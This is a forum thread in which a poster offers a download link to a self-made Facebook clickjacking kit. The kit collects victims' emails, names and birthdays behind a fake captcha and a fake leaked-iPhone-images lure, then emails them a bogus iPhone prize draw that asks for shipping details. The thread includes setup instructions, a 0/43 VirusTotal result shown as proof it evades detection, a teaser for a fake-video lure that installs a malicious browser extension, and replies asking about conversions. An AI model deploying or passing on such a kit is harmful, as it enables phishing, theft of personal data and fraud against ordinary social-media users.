[DOWNLOAD] New Facebook Exploit Discovered By Me. Coded By Me. Grab It!

StellaArtois

BANNED
Joined
Jun 13, 2011
Messages
104
Reaction score
357
To cut a long story short Facebook are suing the living s**t out of me. Can't discuss any more than that, but I'm on a war path now. A battle against them.

So, here is the first release. Nobody has done this before, so I am releasing it here.

Test: http://bbmluv.com/reg/
Download: http://www.mediafire.com/?4i8frybeodve7xn

Basically what it does is collects the users email, name and birthday, and sends them an email. It click jacks a Facebook plugin.

Instructions:

Open index.php and edit the line that contains "meta property="og:url"" with your own URL. Scroll down to the line that contains "https://www.facebook.com/plugins/registration.php" and edit the redirect URL with your own domain. Remember to add r.php to the end of your link.

Open r.php and edit the SITE_URL, the APP ID and APP SECRET. If you would like to modify the message that's sent to the user via email just edit the $message variable in r.php. Remember to manually add line breaks to the message using "\n".

And that's all there is to it. I tested using "BBC Leaks iPhone 5 Images". Once the user types in the pretend captcha they are redirected to r.php which sends them an email with the link to the leaked images, and also tells them they've been entered into a free iPhone 4 prize draw and they need to provide shipping details. In the email they are linked to win.php which then selects an iPhone 4 offer based on their country.

I'll be posting a couple fresh stuff over the month.

Feel free to ask questions.

Next Release: http://www.addcovers.net/video/video.html ... this allows you to post a pretend flash video on your wall that alerts the user they are missing a plugin. At the press of a button it will download an extension. Test it, paste that link into your Facebook. I will be including the chrome and FF extension templates with it. Will release that tomorrow maybe :D
 
Last edited:
VT Scan
Code:
https://www.virustotal.com/file/f0cf616bdbfb9f7949a85089f4fd87232f7edcfa61dbe3e6d6e1ba2ed010ff35/analysis/1329667352/
File name: fbreg.zip
Detection ratio: 0 / 43
Analysis date: 2012-02-19 16:02:32 UTC ( 1 minute ago )
 
Great share thanks, just out of curiosity what are conversions like on the iphone 4 method so far?
 
Great share thanks, just out of curiosity what are conversions like on the iphone 4 method so far?

iPhone 4 stuff has been abused in the past. I wasn't actually testing for conversions but just used it as an example for the script.
 
In in index.php what link do we add to "meta property="og:url"

Just a sample link will do :)

thanks :)
 
In in index.php what link do we add to "meta property="og:url"

Just a sample link will do :)

thanks :)

The URL the script is hosted on. Im my case it was http://bbmluv.com/reg/. I only use the Open Graph so I could post the link around Facebook.
 
I wish you all the best in your war path against Facebook. But do with care
 
That Facebook Registration plugin is really scary. I guess they will put a captcha on it sooner or later.
 
If your being sued by FB for this Exploit, why would you post it here in an open forum? or anywhere for that matter?


I'm not a lawyer, and don't pretend to be, but common sense would tell me, If they ever found out that I posted the code here, that it would prove intent and could very well, Put my case in jeopardy.....

I mean, You do what you want, i'm just curious about it...
 
That Facebook Registration plugin is really scary. I guess they will put a captcha on it sooner or later.

Yeah I'm guessing so. Once the learn about the clickjacking they will either remove the iFrame option or stick a captcha on it.
 
If your being sued by FB for this Exploit, why would you post it here in an open forum? or anywhere for that matter?


I'm not a lawyer, and don't pretend to be, but common sense would tell me, If they ever found out that I posted the code here, that it would prove intent and could very well, Put my case in jeopardy.....

I mean, You do what you want, i'm just curious about it...

They are not suing over this. They are suing over a whole list of things. I am just winding them up by saying "Hey Facebook, look, I don't give a shite".

Legal issue do not scare me. Never have, never will. The get out clause is to purchase gold bullion with any cash, and declare yourself bankrupt.

People wind themselves up fearing being sued.
 
i cant understand, when i type captcha in your domain, the continue button never works. where should we click so that it takes our email and other information etc.
 
i cant understand, when i type captcha in your domain, the continue button never works. where should we click so that it takes our email and other information etc.

Are you logged into Facebook whilst you're testing it?
 
wow dude you rock!.. thanks for the share.. gotta download this before it get's to jr.vip
 
Back
Top